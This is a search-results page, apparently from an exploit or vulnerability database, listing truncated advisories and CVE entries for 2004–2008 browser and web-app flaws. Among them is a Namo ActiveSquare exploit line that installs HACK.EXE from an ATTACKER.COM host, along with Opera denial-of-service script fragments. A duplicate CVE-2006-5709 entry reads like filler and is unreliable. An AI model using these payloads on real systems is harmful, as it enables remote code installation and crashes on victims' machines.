326 matches found
Host Directory PRO - Cookie Security Bypass
Host Directory PRO - Cookie Security Bypass source: https://www.securityfocus.com/bid/28863/info Host Directory PRO is prone to a security-bypass vulnerability because it fails to properly validate user credentials before performing certain actions. Exploiting this issue may allow an attacker to...
CcMail 1.0.1 - Insecure Cookie Handling
CcMail = 1.0.1 Insecure Cookie Handling Discovered By: t0pP8uZz Discovered On: 11 April 2008 Script...
WebCT 4.x Javascript Session Stealer
WebCT 4.x Javascript Session Stealer Exploits Software: WebCT Campus Edition 4.x http://secunia.com/product/3280/ Affected Version: 4.1.5.8 Discoverer: Benjamin "balupton" Lupton Date Discovered: November 2005 Date Reported: 25/06/2007 Software Author Contacted again on: 20/07/2007 Date Published...
Sejoong Namo ActiveSquare 6 - 'NamoInstaller.dll' install Method
Namo Web Editor NamoInstaller.dll install Method Exploit function Check obj.Install"http://ATTACKER.COM/HACK.EXE" Unable to create object tml -- milw0rm.com 2008-01-25...
SquirrelMail GPGP Encryption Plugin 2.02.1 - Access Validation Input Validation
SquirrelMail GPGP Encryption Plugin 2.02.1 - Access Validation Input Validation source: https://www.securityfocus.com/bid/26788/info The G/PGP encryption plugin for SquirrelMail is prone to an input-validation vulnerability and an access-validation vulnerability. Attackers can exploit these issue...
Ubuntu 6.06 LTS / 6.10 / 7.04 / 7.10 : firefox vulnerabilities (USN-535-1)
Various flaws were discovered in the layout and JavaScript engines. By tricking a user into opening a malicious web page, an attacker could execute arbitrary code with the user's privileges. CVE-2007-5336, CVE-2007-5339, CVE-2007-5340 Michal Zalewski discovered that the onUnload event handlers we...
Opera 9.10 - alert() Remote Denial of Service
Opera 9.10 - alert Remote Denial of Service \n" File.write"\n" Bof = 'A'44444 File.write"alert'"+Bof+"'\n" File.write"\n" File.write"" File.close --...
CVE-2006-5709
Unspecified vulnerability in WorldClient in Alt-N Technologies MDaemon before 9.50 has unknown impact and attack vectors related to a "JavaScript exploit."...
CVE-2006-5709
Technical details about CVE-2006-5709 are not publicly provided in the supplied documents. Monitor for updates; no affected products, exploit info, or remediation details are confirmed here.
MS Internet Explorer 7 Popup Address Bar Spoofing-vulnerability warning-the black bar safety net
IE 7 Exploits .. ! Program code program code !-- Secunia Advisory: SA22542 Release Date: 2006-10-25 Impact: Spoofing Solution Status: Unpatched Software: Microsoft Internet Explorer 7.x Description: A weakness has been discovered in Internet Explorer, which can be exploited by malicious people t...
CVE-2006-2787
EvalInSandbox in Mozilla Firefox and Thunderbird before 1.5.0.4 allows remote attackers to gain privileges via javascript that calls the valueOf method on objects that were created outside of the sandbox...
captivateXSS.txt
Captivate 1.0 Homepage: http://new-place.org/scripts/ Description: A basic but highly-customizable PHP gallery script with optional thumbnail creation. Designed with screencaps in mind, it works best for large galleries of same-sized images. Affected files: gallery.php Improper filtering of actio...
CVE-2006-1737
Integer overflow in Mozilla Firefox and Thunderbird 1.x before 1.5 and 1.0.x before 1.0.8, Mozilla Suite before 1.7.13, and SeaMonkey before 1.0 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary bytecode via JavaScript with a large regular expression...
Mozilla Firefox 1.0.7 (Mozilla 1.7.12) - Denial of Service
document.write''; milw0rm.com 2005-10-17...
Local file detection bug found through Adobe SVG Viewer
Hyperdose Security Advisory Name: Local file detection bug found through Adobe SVG Viewer Systems Affected: v3.0 unclear if earlier versions were affected Severity: Low Author: Robert Fly Advisory URL: http://www.hyperdose.com/advisories/H2005-07.txt --Adobe Description--...
Netscape Navigator 7.2 - Infinite Array Sort Denial of Service
Netscape Navigator 7.2 - Infinite Array Sort Denial of Service source: https://www.securityfocus.com/bid/12331/info Netscape Navigator is prone to a vulnerability that may result in a browser crash. This issue is exposed when the browser performs an infinite JavaScript array sort operation. It is...
CVE-2004-2219
Microsoft Internet Explorer 6 allows remote attackers to spoof the address bar to facilitate phishing attacks via Javascript that uses an invalid URI, modifies the Location field, then uses history.back to navigate to the previous domain, aka NullyFake...
Microsoft Internet Explorer - Remote Code Execution
Microsoft Internet Explorer - Remote Code Execution CMDExe - Windows Exploit - Remote code execution with parameters - Proof of Concept More info about this exploit can be found at hhttp://freehost19.websamba.com/shreddersub7/expl-discuss.htm. © 2004 ShredderSub7 function DisplayLocStrings...
CVE-2004-1173
Internet Explorer 6 allows remote attackers to bypass the popup blocker via the document object model (DOM) methods in the DHTML Dynamic HTML (DHTML) Editing Component (DEC) and Javascript that calls showModalDialog...